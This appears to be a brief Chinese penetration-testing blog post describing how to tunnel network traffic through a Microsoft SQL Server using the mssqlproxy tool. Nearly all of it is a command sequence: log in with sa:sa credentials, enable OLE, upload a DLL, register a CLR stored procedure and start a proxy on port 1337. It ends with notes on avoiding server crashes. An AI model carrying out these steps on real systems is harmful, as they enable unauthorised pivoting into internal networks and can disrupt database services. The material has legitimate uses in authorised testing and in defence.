mssql隧道

    渗透测试 lz520520 4年前 (2020-10-10) 1184次浏览

    https://github.com/blackarrowsec/mssqlproxy

    # 连接mssql
    python mssqlclient.py sa:sa@192.168.1.1
    # 启用ole
    enable_ole
    # 上传reciclador.dll
    upload reciclador.dll c:\programdata\reciclador.dll
    # 开启clr,注册存储过程Microsoft.SqlServer.Proxy
    python mssqlclient.py sa:sa@192.168.1.1 -install -clr Microsoft.SqlServer.Proxy.dll
    # 检查CLR已准备好
    python mssqlclient.py sa:sa@192.168.1.1 -check -reciclador c:\programdata\reciclador.dll
    # 开启代理,默认为TCP 1337,可通过-local-port设置
    python mssqlclient.py sa:sa@192.168.1.1 -start -reciclador c:\programdata\reciclador.dll

    PS:
    1. 如果通过代理访问,需要设置-no-check-src-port
    2. 仅支持IPv4
    3. 并发过高会导致mssql服务crash
    4. 关闭代理请使用ctrl+C,否则可能导致服务器crash


    Security , 版权所有丨如未注明 , 均为原创丨
    转载请注明原文链接:mssql隧道
    喜欢 (15)